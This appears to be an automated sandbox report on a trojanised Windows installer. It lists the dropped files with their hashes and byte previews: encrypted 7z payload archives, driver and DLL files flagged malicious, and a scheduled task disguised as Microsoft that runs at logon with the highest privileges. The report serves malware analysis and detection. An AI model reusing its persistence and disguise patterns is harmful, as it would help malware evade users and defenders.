                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...

                            C:\Program Files (x86)\Windows NT\locale4.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

                            C:\Program Files (x86)\Windows NT\locale7.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

                            C:\Program Files (x86)\Windows NT\locale7.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

                            C:\Program Files (x86)\Windows NT\res.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):2054096
                            Entropy (8bit):7.999911973951708
                            Encrypted:true
                            SSDEEP:49152:q2vqFHUMpJh0mjPzJvUUeSCWZbM00JoC/iZ7YHmwKm5OiRg/3btc:qVUMpskLJ00KLxiO/7g/3btc
                            MD5:D5A5A092107E0215609A9C71466EADAE
                            SHA1:50D6E1FB8CDE0E7F7131F12CAF2AD728274EE8FE
                            SHA-256:9007F916A0B68BBE7701F9940D8635E0A0F5E417F600AC875BDEDCEDDECA1F04
                            SHA-512:21F6575350F9840FFE4ED3A6F40EC584848FCD56D1ADD9FCAD527B54B097BCE5DF29F1B39DE709C632E1770C69D1D893BED53518B78AE64ADE9F36B3892B006D
                            Malicious:false
                            Preview:7z..'.....nVpW......@..........J).^G.......m.r..T..Y...s..z4z@..t.6 L.L..\.`..`.~2..M^.;....fnQ...fC.h.@aR....=.&...Se...#Y`..."6N.].0.....1.6s..S.......9..n.l.9.:.....#.....u!......^..........G....v..8....fVd..s..h..._.Q......y.A._g...CBXi~}[.6.Q@..T/..u....w=...n...".^5....#../H.M.|k..; d/d...H.8..,.l.{x^..!......Q.p......>..uU....;9....N..&+.....j.>5...K3..moC.r......J.X.7t...!|....pb.U&.U.mg...*..)....k.U......gr..%.\&V.....p..%\4.P..s....o.~.D..7qY.J...b.F.Gj.......ioV=.L".3-...-[=V`....B..d/p"..._..v?...,.i..d~...)...s.;.AG..m./qc.u.V.?LF...@..0..P.tn.....{I ./A-...5.~A..Z.$7......'y..W.!.x...`.X.......A.........W'D..=.J2^......{.....Y....\...<... ?..=(.;.?].>.....;...1.....U......y...Z...X.[...%.&..x..k.....!...._..\.L...`v.^...|.T..rA3h.....ff..[.o.....m.o........".O...I...KAj.<..u...[...R."..~.E.!...E..*#..f..}C...l.,4.._R.S;9......Zv...w.^...+.]s3.~.6....ih.a!U.S..<..[...G...N......s3..-.......Z.../...g....L[...h.oS.,..o1...1..

                            C:\Program Files (x86)\Windows NT\tProtect.dll

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            • Antivirus: Virustotal, Detection: 6%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

                            C:\Program Files (x86)\Windows NT\task.xml

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3482223822620667
                            Encrypted:false
                            SSDEEP:48:dXKLzDln/L6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnewhldOVQOj6dKbKsz7
                            MD5:1E1D0466AB0FE8F2802587D337A10567
                            SHA1:362B3B6EFBE51EBD0702167061812CA567BB11BD
                            SHA-256:8B761FF2FDDF15A5E1AB4758D2112550B9A857F3B77F6A8EDC5F33586AEA06EC
                            SHA-512:4F37DAE32D421BB88B4C2B079461BE28F47343E84A1546519CC8107C2A842C16D14D736504457E4586BFB92E68B01D905BC3B45C4F68FA1FF6E87B41A9996809
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwo

                            C:\Program Files (x86)\Windows NT\trash

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1803979
                            Entropy (8bit):7.999882930255694
                            Encrypted:true
                            SSDEEP:49152:ZU4rm4ToT3YZyQXl/kpD0EClXO9XQv5y9wNz:ZpCcJl/k6k9gvfNz
                            MD5:120881F751D8AC3C5ABE1FED5EFAD2AE
                            SHA1:DDB9BDACE6DE20213B844BE9E1FE67B475660455
                            SHA-256:30877048AFCE36333CEFC1E52079DDA43FEB7412F59B5AF132EBF2F3BB710D29
                            SHA-512:EE8B6E2A25F1F94D460502884C03F118DE8D08AB25C31ACEE987C0D16ED69910F4A1D6B785162FBAB5D4DB1AE09F556117C5895D9FDABC2BC766B324B9E54E41
                            Malicious:false
                            Preview:V.y.(.P.U..%...A{...&i.&..8.;...?....R.........*..o...r...*.r........F..~.5XoZ.4...$.. ..>n....[F..=.V...2M?.c.x..5...Y....".s.g.Y..F..3../Q.={!BO.Kz`.8\z...2.g..Z].ZY.};./.c..=.<Um{1...3.3(.....%4...a/.E3..5<..&..U.K;..yD5....d............g.;..8.......v?.Ib...v..J......W...?<.~w..&........c...H...R..vo.Da.3.H.".Y.8.q...B....l\R.D.L...J'G.... .f.K#..Q'.x.Wj....b..v...g..&.o@=.p..j.......h#.......r..!.....Ga.2..4.'f......{.a......D..m.i.+OiG...W.....B...>&..R_.(.ur.x..e....<.e...p.*....%..y4..j.....fP#....%.v.-..}...w......'. ..J.}..H..~!K.#..v4....EX.X3...>.o...0Hw^...t..X....+..S.F.5...E.la....d..R...D.-..hx6....'..PF....*).h....Qq..VU..~..Qi..c-.E.......V..c~N..X...OO.V.. H.....5U...[B.3..N?.0....#.....;.v....2.Y............f..A..v.Z.t:....n.v.UE.A.c.@.d..L.)...l...[....U.kw.B.l...S..E.......[..V..$C%..|KK..=..r..N*.t.G....&.].X.Q...:..k.........h..../N4...C$..t.V.x..t..p.......H@.....(.s8v..I...}`A...)f..%...._[.Z..#S.F..v|.I].....

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:NlllulpgztZ:NllUO
                            MD5:ADB67D140C904AFBF0D2C47FCFC73086
                            SHA1:CAA1973FC7AB5367DC2007487049041C6D0AC54E
                            SHA-256:BA09CC360CD10629A32D8E84392BAD452284123893B0792F6417340A72E3B951
                            SHA-512:85BE6449222EAA096A6F84E051D16DB1147498DA621BDB6C7B5D11CF6C306DB4DE90CEB457EDE22CCA53BC94CF4D1E6D0FAE203D196AF7AF225AF87464E1286E
                            Malicious:false
                            Preview:@...e.................................x..............@..........

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihgxjep3.sdd.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ijw2qxaq.rds.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcb1i4jy.tq5.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnbyxgk1.vxf.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\is-1K545.tmp\_isetup\_setup64.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-1K545.tmp\update.vac

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\_isetup\_setup64.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\update.vac

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp

                            Download File
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564940970483
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:CC931C68EF6CB43932F2B21773072C73
                            SHA1:70E6A4F6482CC6006FF0F91A967FC5707B2F90C9
                            SHA-256:3707449B5CFF4A2360DA5BD55A06274C6F934B93BBEEFDF01956665DB3230AE0
                            SHA-512:924E79F925305B052B14D028EB26E9949F4188B293A35F6676BEED39D70CBF9CDBEE96F931FC44084CBB841416EDE807D465865EFCAA388D0C199573B32BEAA4
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                            C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp

                            Download File
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564940970483
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:CC931C68EF6CB43932F2B21773072C73
                            SHA1:70E6A4F6482CC6006FF0F91A967FC5707B2F90C9
                            SHA-256:3707449B5CFF4A2360DA5BD55A06274C6F934B93BBEEFDF01956665DB3230AE0
                            SHA-512:924E79F925305B052B14D028EB26E9949F4188B293A35F6676BEED39D70CBF9CDBEE96F931FC44084CBB841416EDE807D465865EFCAA388D0C199573B32BEAA4
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                            \Device\ConDrv

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.949167675813021
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
